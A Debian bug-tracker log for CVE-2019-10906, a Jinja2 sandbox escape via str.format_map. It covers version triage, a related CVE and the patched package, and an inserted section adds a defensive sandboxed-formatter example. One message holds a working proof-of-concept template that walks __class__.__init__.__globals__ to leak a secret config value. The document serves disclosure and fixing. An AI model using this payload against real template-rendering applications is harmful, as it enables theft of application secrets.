jinja2: CVE-2019-10906

Related Vulnerabilities: CVE-2019-10906   CVE-2016-10745  

Debian Bug report logs - #926602
jinja2: CVE-2019-10906


Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sun, 7 Apr 2019 17:21:01 UTC

Severity: grave

Tags: patch, security, upstream

Found in versions jinja2/2.10-1, jinja2/2.7.3-1, jinja2/2.8-1

Fixed in version jinja2/2.10-2

Done: Piotr Ożarowski <piotr@debian.org>



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2. (Sun, 07 Apr 2019 17:21:04 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Piotr Ożarowski <piotr@debian.org>. (Sun, 07 Apr 2019 17:21:04 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: jinja2: CVE-2019-10906
Date: Sun, 07 Apr 2019 19:20:07 +0200
Source: jinja2
Version: 2.10-1
Severity: grave
Tags: patch security upstream

Hi,

The following vulnerability was published for jinja2.

CVE-2019-10906[0]:
| In Pallets Jinja before 2.10.1, str.format_map allows a sandbox
| escape.


If you fix the vulnerability, please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-10906
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10906
[1] https://palletsprojects.com/blog/jinja-2-10-1-released/
[2] https://github.com/pallets/jinja/commit/a2a6c930bcca591a25d2b316fcfd2d6793897b26

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Information forwarded to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2. (Mon, 08 Apr 2019 07:39:07 GMT) (full text, mbox, link).


Acknowledgement sent to Hugo Lefeuvre <hle@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>. (Mon, 08 Apr 2019 07:39:07 GMT) (full text, mbox, link).


Message #10 received at 926602@bugs.debian.org (full text, mbox, reply):

From: Hugo Lefeuvre <hle@debian.org>
To: debian-lts@lists.debian.org
Cc: 926602@bugs.debian.org
Subject: CVE-2019-10906 - jinja sandbox escape poc
Date: Mon, 8 Apr 2019 09:29:30 +0200
Hi,

I'm working on a potential jinja2 Debian LTS security update. Here is a
proof of concept which allows one to reproduce the issue easily. This should
help confirm the vulnerability in other suites.

>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
...     def __init__(self, name):
...         self.name = name
...
>>> t = env.from_string('{{ "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"

Expected behaviour would be jinja2.exceptions.SecurityError.

Adapted from[0].

regards,
 Hugo

[0] https://palletsprojects.com/blog/jinja-281-released/

-- 
                Hugo Lefeuvre (hle)    |    www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C

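The PoC above escapes the sandbox because `str.format_map` resolves `{x.__class__...}` with plain `getattr`, so none of the sandbox's attribute policy is consulted. The block below is an added example (not code from this bug report, from Jinja, or from the Debian package) showing the hardening idea behind the upstream fix: a `string.Formatter` subclass that walks each replacement field hop by hop and checks every attribute access against a sandbox rule before performing it. All names in it (`SecurityError`, `SandboxedFormatter`, `safe_format_map`, `safe_format`, `leaks_secret`, `CONFIG`, `User`) are this example's own, and `CONFIG` is a constructed stand-in for the `config` dict in the PoC.

```python
"""Sandbox-aware str.format / str.format_map (added example, not Jinja's API)."""
import re
import string


class SecurityError(Exception):
    """Raised when a format field tries to traverse an attribute the sandbox forbids."""


# Constructed stand-in for an application config living in module globals,
# playing the role of `config` in the PoC.
CONFIG = {"SECRET_KEY": "constructed-example-secret"}


class User:
    """Constructed object handed to the template. Its __init__ is a plain function,
    so __init__.__globals__ is this module's namespace, where CONFIG lives."""

    def __init__(self, name):
        self.name = name


def is_safe_attribute(obj, attr):
    """Policy: refuse private and dunder attributes (the same rule a template
    sandbox applies to ``obj.attr`` lookups); everything else is allowed."""
    return not attr.startswith("_")


# A field name is <first>(.attr | [item])*: `.attr` is an attribute hop, `[item]` an item hop.
_FIRST_RE = re.compile(r"[^.\[]*")
_HOP_RE = re.compile(r"\.([^.\[]+)|\[([^\]]*)\]")
_REST_RE = re.compile(r"(?:\.[^.\[]+|\[[^\]]*\])*")


class SandboxedFormatter(string.Formatter):
    """string.Formatter whose field resolution consults is_safe_attribute on every
    attribute hop. Plain str.format / str.format_map never offer that hook."""

    def get_field(self, field_name, args, kwargs):
        first = _FIRST_RE.match(field_name).group(0)
        rest = field_name[len(first):]
        if not _REST_RE.fullmatch(rest):
            # Reject malformed field names instead of silently skipping parts of them.
            raise ValueError(f"malformed replacement field {field_name!r}")
        key = int(first) if first.isdigit() else first
        obj = self.get_value(key, args, kwargs)
        for attr, item in _HOP_RE.findall(rest):
            if attr:
                if not is_safe_attribute(obj, attr):
                    raise SecurityError(
                        f"access to attribute {attr!r} of {type(obj).__name__} is unsafe"
                    )
                obj = getattr(obj, attr)
            else:
                # Item access (dict key / sequence index) is not an attribute hop.
                # The PoC's chain is already cut at `__class__`, before any item hop.
                obj = obj[int(item) if item.isdigit() else item]
        return obj, key


def safe_format_map(template, mapping):
    """Drop-in for template.format_map(mapping) with the sandbox policy applied."""
    return SandboxedFormatter().vformat(template, (), mapping)


def safe_format(template, *args, **kwargs):
    """Drop-in for template.format(*args, **kwargs) with the sandbox policy applied."""
    return SandboxedFormatter().vformat(template, args, kwargs)


def leaks_secret(formatter):
    """Render the PoC's traversal through `formatter(template, mapping)` and report
    whether the secret came out, to contrast plain and sandboxed formatting."""
    template = "{x.__class__.__init__.__globals__[CONFIG]}"
    try:
        rendered = formatter(template, {"x": User("joe")})
    except SecurityError:
        return False
    return CONFIG["SECRET_KEY"] in rendered


if __name__ == "__main__":
    print("plain str.format_map leaks secret:", leaks_secret(lambda t, m: t.format_map(m)))
    print("sandboxed format_map leaks secret:", leaks_secret(safe_format_map))
    print(safe_format_map("Hello {x.name}!", {"x": User("joe")}))
```

Ordinary fields (`{x.name}`, positional `{}`, `{0[1]}`) keep working; the dunder hop raises `SecurityError`, which is the behaviour Hugo names as expected. The upstream fix follows the same approach inside `SandboxedEnvironment`: calls to `str.format` and `str.format_map` are intercepted and their field lookups routed through the sandbox's own attribute and item checks, which is why Jinja 2.8.1 (for `format`, CVE-2016-10745) and 2.10.1 (for `format_map`, CVE-2019-10906) are two patches for one underlying gap.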
Marked as found in versions jinja2/2.8-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 08 Apr 2019 08:09:06 GMT) (full text, mbox, link).


Marked as found in versions jinja2/2.7.3-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Mon, 08 Apr 2019 08:09:08 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2. (Mon, 08 Apr 2019 08:45:03 GMT) (full text, mbox, link).


Acknowledgement sent to Hugo Lefeuvre <hle@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>. (Mon, 08 Apr 2019 08:45:03 GMT) (full text, mbox, link).


Message #19 received at 926602@bugs.debian.org (full text, mbox, reply):

From: Hugo Lefeuvre <hle@debian.org>
To: 926602@bugs.debian.org
Cc: debian-lts@lists.debian.org
Subject: Re: CVE-2019-10906 - jinja sandbox escape poc
Date: Mon, 8 Apr 2019 10:04:35 +0200
> This should help confirming vulnerability in other suites.

2.7.3-1 and all later releases are affected. In addition, both 2.7.3-1 and
2.8-1 are affected by the previous str.format issue[0].

[0] https://palletsprojects.com/blog/jinja-281-released/

-- 
                Hugo Lefeuvre (hle)    |    www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C

Information forwarded to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2. (Mon, 08 Apr 2019 13:15:12 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>. (Mon, 08 Apr 2019 13:15:12 GMT) (full text, mbox, link).


Message #24 received at 926602@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Hugo Lefeuvre <hle@debian.org>, 926602@bugs.debian.org
Subject: Re: Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Date: Mon, 8 Apr 2019 15:13:08 +0200
Hi Hugo,

On Mon, Apr 08, 2019 at 10:04:35AM +0200, Hugo Lefeuvre wrote:
> > This should help confirming vulnerability in other suites.
> 
> 2.7.3-1 and all later releases affected. In addition, both 2.7.3-1 and
> 2.8-1 are affected by the previous str.format issue[0].
> 
> [0] https://palletsprojects.com/blog/jinja-281-released/

CVE-2016-10745 was assigned for this issue.

Regards,
Salvatore



Information forwarded to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2. (Mon, 08 Apr 2019 21:03:09 GMT) (full text, mbox, link).


Acknowledgement sent to Hugo Lefeuvre <hle@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>. (Mon, 08 Apr 2019 21:03:09 GMT) (full text, mbox, link).


Message #29 received at 926602@bugs.debian.org (full text, mbox, reply):

From: Hugo Lefeuvre <hle@debian.org>
To: Salvatore Bonaccorso <carnil@debian.org>
Cc: 926602@bugs.debian.org
Subject: Re: Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Date: Mon, 8 Apr 2019 22:20:29 +0200
Hi Salvatore,

> CVE-2016-10745 was assigned for this issue.

Thanks for the information.

I just noticed you added CVE-2016-10745 to the tracker. I am fairly
confused: do you know why this CVE was not referenced in the tracker?
Or did you just request it?

cheers,
Hugo

-- 
                Hugo Lefeuvre (hle)    |    www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C

Information forwarded to debian-bugs-dist@lists.debian.org, Piotr Ożarowski <piotr@debian.org>:
Bug#926602; Package src:jinja2. (Tue, 09 Apr 2019 04:39:03 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Piotr Ożarowski <piotr@debian.org>. (Tue, 09 Apr 2019 04:39:03 GMT) (full text, mbox, link).


Message #34 received at 926602@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Hugo Lefeuvre <hle@debian.org>
Cc: 926602@bugs.debian.org
Subject: Re: Bug#926602: CVE-2019-10906 - jinja sandbox escape poc
Date: Tue, 9 Apr 2019 06:35:20 +0200
Hi Hugo,

On Mon, Apr 08, 2019 at 10:20:29PM +0200, Hugo Lefeuvre wrote:
> Hi Salvatore,
> 
> > CVE-2016-10745 was assigned for this issue.
> 
> Thanks for the information.
> 
> I just noticed you added CVE-2016-10745 to the tracker. I am fairly
> confused, do you know why this CVE was not referenced in the tracker?
> Or did you just request it?

It was not referenced, because there was no CVE yet. I was irritated
that for the later issue apparently a CVE was assigned, but not for
the original first issue, so I requested a CVE for it.

It would have shown up on the next CVE list update, but given I got the
confirmation from MITRE on the assignment I then already added it to
the tracker.

So in short, yes, I did request the CVE and it was assigned yesterday.

Regards,
Salvatore



Message sent on to Salvatore Bonaccorso <carnil@debian.org>:
Bug#926602. (Tue, 09 Apr 2019 14:33:03 GMT) (full text, mbox, link).


Message #37 received at 926602-submitter@bugs.debian.org (full text, mbox, reply):

From: Thomas Goirand <zigo@debian.org>
To: 926602-submitter@bugs.debian.org
Subject: Bug #926602 in jinja2 marked as pending
Date: Tue, 09 Apr 2019 14:31:06 +0000
Control: tag -1 pending

Hello,

Bug #926602 in jinja2 reported by you has been fixed in the
Git repository and is awaiting an upload. You can see the commit
message below and you can check the diff of the fix at:

https://salsa.debian.org/python-team/modules/jinja2/commit/780a157c0466ac02204a8707ce7c06b6b011203f

------------------------------------------------------------------------
* Team upload.
  * CVE-2019-10906: In Pallets Jinja before 2.10.1, str.format_map allows a
    sandbox escape. Applied upstream patch: sandbox_str.format_map.patch
    (Closes: #926602).
------------------------------------------------------------------------

(this message was generated automatically)
-- 
Greetings

https://bugs.debian.org/926602



Added tag(s) pending. Request was from Thomas Goirand <zigo@debian.org> to 926602-submitter@bugs.debian.org. (Tue, 09 Apr 2019 14:33:03 GMT) (full text, mbox, link).


Reply sent to Piotr Ożarowski <piotr@debian.org>:
You have taken responsibility. (Tue, 09 Apr 2019 20:42:09 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Tue, 09 Apr 2019 20:42:09 GMT) (full text, mbox, link).


Message #44 received at 926602-close@bugs.debian.org (full text, mbox, reply):

From: Piotr Ożarowski <piotr@debian.org>
To: 926602-close@bugs.debian.org
Subject: Bug#926602: fixed in jinja2 2.10-2
Date: Tue, 09 Apr 2019 20:39:05 +0000
Source: jinja2
Source-Version: 2.10-2

We believe that the bug you reported is fixed in the latest version of
jinja2, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 926602@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Piotr Ożarowski <piotr@debian.org> (supplier of updated jinja2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 09 Apr 2019 21:58:20 +0200
Source: jinja2
Binary: python-jinja2 python-jinja2-doc python3-jinja2
Architecture: source all
Version: 2.10-2
Distribution: unstable
Urgency: high
Maintainer: Piotr Ożarowski <piotr@debian.org>
Changed-By: Piotr Ożarowski <piotr@debian.org>
Description:
 python-jinja2 - small but fast and easy to use stand-alone template engine
 python-jinja2-doc - documentation for the Jinja2 Python library
 python3-jinja2 - small but fast and easy to use stand-alone template engine
Closes: 926602
Changes:
 jinja2 (2.10-2) unstable; urgency=high
 .
   [ Thomas Goirand ]
   * CVE-2019-10906: In Pallets Jinja before 2.10.1, str.format_map allows a
     sandbox escape. Applied upstream patch: sandbox_str.format_map.patch
     (Closes: #926602).
Checksums-Sha1:
 ad35571166658a559fe50d46c53ccda31a1fdfe3 2188 jinja2_2.10-2.dsc
 bc2a7fcc95f26af7b45a839e8e42c3cbfa8240f7 7612 jinja2_2.10-2.debian.tar.xz
 920ba33b164cd87ff1020c2aaeff24d904696fc2 7870 jinja2_2.10-2_amd64.buildinfo
 a8c1502e3f5ec43c20583212f89fe77a5e4dda40 169572 python-jinja2-doc_2.10-2_all.deb
 4998b0bac85db510ec5422ed6b5056ef53b0448e 105804 python-jinja2_2.10-2_all.deb
 d32fd421186c32f236eb91462e98ea16af8d96a1 106500 python3-jinja2_2.10-2_all.deb
Checksums-Sha256:
 249b2258365a9a00877676e910695831ef38725f29c27dd1796951176a8b084e 2188 jinja2_2.10-2.dsc
 ad9348e80c397ff351b0a3b9dc8f9da7d19f450ad35939157a9f0691fb5a4326 7612 jinja2_2.10-2.debian.tar.xz
 de666d7a5300290405a629af59ae2d5b69b8eb35c7ab18b5cff6a7a080fd4069 7870 jinja2_2.10-2_amd64.buildinfo
 d099f8f265e0419ac1713db503655bddf0581ec9fb96cf138f0b058a2df9bf42 169572 python-jinja2-doc_2.10-2_all.deb
 edba7679b955edfa8b02d9fa9c3a31e2aa8f8c2292b940d9f8fe2bb8af1ce8c0 105804 python-jinja2_2.10-2_all.deb
 a9e5f3c829454f0277fdbee499ab9060a9424e565c923259d35612d5e2216284 106500 python3-jinja2_2.10-2_all.deb
Files:
 f46478e5ecf225026c6ad771a92143a7 2188 python optional jinja2_2.10-2.dsc
 467632bf04e415df5ab2d3d1f8900f17 7612 python optional jinja2_2.10-2.debian.tar.xz
 01c580fcb8404948be1729ae33589901 7870 python optional jinja2_2.10-2_amd64.buildinfo
 052879a04049ed5d77e630bdf4ffa692 169572 doc optional python-jinja2-doc_2.10-2_all.deb
 6b8a4a47829e126f40b227ad5a7d1f08 105804 python optional python-jinja2_2.10-2_all.deb
 ee244b485fadaad460ebc7cef0fda2b8 106500 python optional python3-jinja2_2.10-2_all.deb

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEHS+omFjar2IXhi33rvbxoqdFdkUFAlys+hcACgkQrvbxoqdF
dkUgUg/+PI6kSahVNByBsipVdlkc1aQoANWzmZFtDpAFqxe7FOlc9uBdAkXSG4JN
Yz/dVE6eJbyo0xn7PMesFhmmX9hHQcCtSorac5BBcncwArl6mOuP+QFpmqBsa7Bu
fM3oDvNsvjwQb2N5No8xFRIMyihnLjN4fchYNLYippjdmSzQR9RY22nkgC3c9amY
dCVxb3kUPL3H26QO0s9sgpXcQgvCouTwIhI+1PgwfRnLSNqdsG0JotY1a82DOJUy
An9QGI0QwaWArvpMUaO99b+SX17iZJW3e3fIU4801QkvEyrAoLGx0wzN1bcLAhv/
nZutNLVP+y9xhw+spSZ4eQjw6lbDNMQCuTkAJLY20U3kIMMG13rZ+QTM8nN5SpX3
0eaoyBeMByaRmoUfo4Ia5udpMoj3GLmc2ElBSuHexSWyv7lzYj5ErSssEj+CD965
Vg1SuwirbubKAUoFV5iQNpszczLtzH3FxoG1KfWRVza8cmfKhz4Xl/eqc/HcE04w
q1RPQq4URWGoaoVL2/RXCnEmhLUobC2LFF+cNCvv8880RDv538A59+961uguGnL9
NfHdaXKQxqNfcpEzJ1dYVnbjFhcTpAe89MOL05ovw7rah0yPt3CxAeTg1GttEYrf
P127OBBU+hdNyX/a4VxrnIzGwFBlr7p5mUrCCqGC0Jiiw9djWT8=
=UhFq
-----END PGP SIGNATURE-----






Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:43:39 2019; Machine Name: buxtehude
